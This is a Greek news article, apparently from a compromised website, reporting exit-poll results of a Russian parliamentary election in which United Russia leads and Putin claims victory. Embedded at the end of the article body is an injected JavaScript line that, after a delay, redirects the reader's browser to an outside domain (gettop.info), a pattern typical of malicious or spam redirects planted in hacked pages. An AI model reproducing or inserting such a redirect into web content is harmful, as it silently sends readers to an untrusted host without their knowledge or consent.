Θρίαμβος του Πούτιν στις βουλευτικές εκλογές της Ρωσίας

0
7

 

 Ποσοστό 44,5% συγκέντρωσε το κυβερνών κόμμα της Ενωμένης Ρωσίας στις σημερινές βουλευτικές εκλογές στη Ρωσία, σύμφωνα με τα exit poll από την κρατική εταιρεία VTsIOM. Στις προηγούμενες εκλογές του 2011 το κόμμα του πρωθυπουργού Ντμίτρι Μεντβέντεφ είχε συγκεντρώσει το 49%.

Σύμφωνα με την ίδια δημοσκόπηση, στις σημερινές εκλογές το εθνικιστικό κόμμα LDPR κατετάγη δεύτερο με 15,3%, ακολουθούμενο από το Κομμουνιστικό Κόμμα με 14,9% και το κόμμα της Δίκαιης Ρωσίας με 8,1%.

Τα φιλελεύθερα κόμματα της αντιπολίτευσης, οι μόνες παρατάξεις που εκφράζονται ανοικτά επικριτικά κατά του Ρώσου προέδρου Βλαντίμιρ Πούτιν, δεν υπερέβησαν το όριο του 5% και δεν κατάφεραν να μπουν στο Κοινοβούλιο, αν και κάποιοι από τους υποψηφίους τους ενδέχεται να καταφέρουν να εκλεγούν στο Κοινοβούλιο από τις εκλογές στις επιμέρους εκλογικές περιφέρειες.

Ο Ρώσος πρόεδρος Βλαντίμιρ Πούτιν δήλωσε αμέσως μετά την ανακοίνωση των πρώτων αποτελεσμάτων των exit poll πως το κόμμα του νίκησε κι ο λαός ψήφισε το κόμμα του Ενωμένη Ρωσία παρά τους δύσκολους καιρούς. «Μπορούμε να πούμε με βεβαιότητα πως το κόμμα μας έχει κερδίσει», δήλωσε ο Πούτιν έχοντας στο πλάι του τον πρωθυπουργό Ντμίτρι Μεντβέντεφ και ηγέτη του Ενωμένη Ρωσία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here